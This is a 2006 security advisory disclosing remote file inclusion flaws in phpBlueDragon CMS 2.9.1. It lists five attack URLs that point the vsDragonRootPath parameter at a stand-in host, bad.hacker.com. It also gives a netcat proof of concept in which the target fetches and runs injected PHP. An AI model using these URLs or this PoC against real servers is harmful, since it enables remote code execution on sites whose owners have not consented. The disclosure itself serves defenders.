phpBlueDragon CMS 2.9.1 multiple remote file inclusion vuln

2006-06-25T00:00:00
ID SECURITYVULNS:DOC:13313
Type securityvulns
Reporter Securityvulns
Modified 2006-06-25T00:00:00

Description

PHPBlueDragon CMS <= 2.9.1 http://phpbluedragon.net/

Affected files:

root_includes/root_modules/team_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules//rss_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules/manual_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules/forum_admin.php?action=group_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/

Solution:

None

Simple PoC:

nc -l -p 9999 ... http://some.site/root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://192.168.0.xx:9999/ ... $ nc -l -p 9999 GET /public_includes/pub_kernel/pbd_move. HTTP/1.0 Host: 192.168.0.xx:9999

HTTP/0.9 200 OK

<?php phpinfo(); ?> ... System OpenBSD xxx 3.9 xxx i386 ...

Credits: shm